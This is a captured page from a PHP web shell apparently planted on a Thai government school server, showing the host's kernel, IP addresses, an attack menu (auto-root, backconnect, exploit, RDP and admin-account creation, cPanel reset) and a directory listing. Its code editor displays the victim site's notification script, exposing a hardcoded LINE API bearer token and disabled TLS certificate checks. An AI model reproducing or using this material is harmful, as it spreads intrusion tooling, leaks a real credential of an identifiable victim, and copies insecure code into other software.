Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
[ HOME SHELL ]
Name
Size
Permission
Action
bookschool
[ DIR ]
drwxr-xr-x
expand
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxrwxrwx
xml
[ DIR ]
drwxr-xr-x
_notify.php
1.64
KB
-rw-r--r--
css.css
1.06
KB
-rwxr-xr-x
default.php
268
B
-rwxr-xr-x
index.php
802
B
-rwxr-xr-x
menu.php
4.41
KB
-rw-r--r--
menu00.php
3.98
KB
-rwxr-xr-x
menu_mobile.php
1.25
KB
-rwxr-xr-x
permission.php
10.63
KB
-rwxr-xr-x
permission_sch.php
9.37
KB
-rwxr-xr-x
permission_sch_khet.php
13.68
KB
-rwxr-xr-x
return_permission_sch_khet.php
1.2
KB
-rwxr-xr-x
time_inc.php
4.81
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _notify.php
<?php function LineNotify($message){ $token = "XQ0jcGy0jyWtuh4e24wDQGCt444GdTCg6gPbCaSHprA"; $chOne = curl_init(); curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify"); curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt( $chOne, CURLOPT_POST, 1); curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message=$message"); $headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$token, ); curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers); curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec( $chOne ); if(curl_error($chOne)) { //echo 'error:' . curl_error($chOne); }else { $result_ = json_decode($result, true); } //Close connect curl_close( $chOne ); } function LineNotifyPerson($message,$token){ if($token != ""){ $chOne = curl_init(); curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify"); curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt( $chOne, CURLOPT_POST, 1); curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message=$message"); $headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$token, ); curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers); curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec( $chOne ); if(curl_error($chOne)) { //echo 'error:' . curl_error($chOne); }else { $result_ = json_decode($result, true); } //Close connect curl_close( $chOne ); }else{ return false; } } ?>
Close